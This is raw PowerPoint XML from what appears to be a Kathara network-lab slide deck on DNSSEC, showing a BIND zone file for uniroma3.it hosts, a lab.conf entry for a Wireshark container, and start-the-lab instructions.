        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1523600" y="1259632"/>
            <a:ext cx="9144800" cy="4338089"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="7668" cy="1710"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC4FFD6-8C0F-BCE3-CFC2-754514012976}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="7668" cy="1652"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL    60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     dnsuni.uniroma3.it.    root.dnsuni.uniroma3.it. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@                       IN  NS  dnsuni.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@                       IN  NS  dnsuni2.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni.uniroma3.it.     IN  A   110.0.0.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2.uniroma3.it.    IN  A   100.0.75.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1.uniroma3.it.        IN  A   110.0.0.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2.uniroma3.it.        IN  A   110.0.0.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>router.uniroma3.it.     IN  A   110.0.0.3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre.uniroma3.it. IN  A   110.0.0.50</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>www.uniroma3.it.        IN  CNAME uniromatre.uniroma3.it.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{847DC39C-F7C0-E043-E91A-81A3A1A13D74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/db.uniroma3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7303865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AACC28-5F89-FB2C-B356-42DA3D076E7D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3BE5B9-B4B6-26C8-1B46-E9DC7422822A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D832D241-1064-D0BB-090F-37FF948D126E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3FAE4F6-F460-F739-6426-545D34A17180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C266120-A110-D279-19B3-74354D1403F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1829267"/>
            <a:ext cx="7335694" cy="3199466"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351ABE19-1610-77DB-0D49-0A9BEA3DB8D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bridged</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>true</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lscr.io</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>linuxserver</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/wireshark"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[port]="3000:3000"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>num_terms</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]=0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41A3171-0B09-7519-9F6F-71507E1E3882}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="82"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316561603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D215A3-7BE9-3974-5190-9C14A123BABA}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F7D9D36-AFE3-4744-40C4-FE458A80A7C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>tart the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018A78BA-BD69-AFE3-8250-C939269F62AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>start the lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3001 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540505A9-565C-2F4A-2213-466D6DA42880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0B136C0-EAA0-92F9-0472-9B4AAF831E17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662ED0A0-C080-B250-FCEE-C5C3C1ECF584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2191793"/>
            <a:ext cx="10972800" cy="1237207"/>
            <a:chOff x="607480" y="2378845"/>
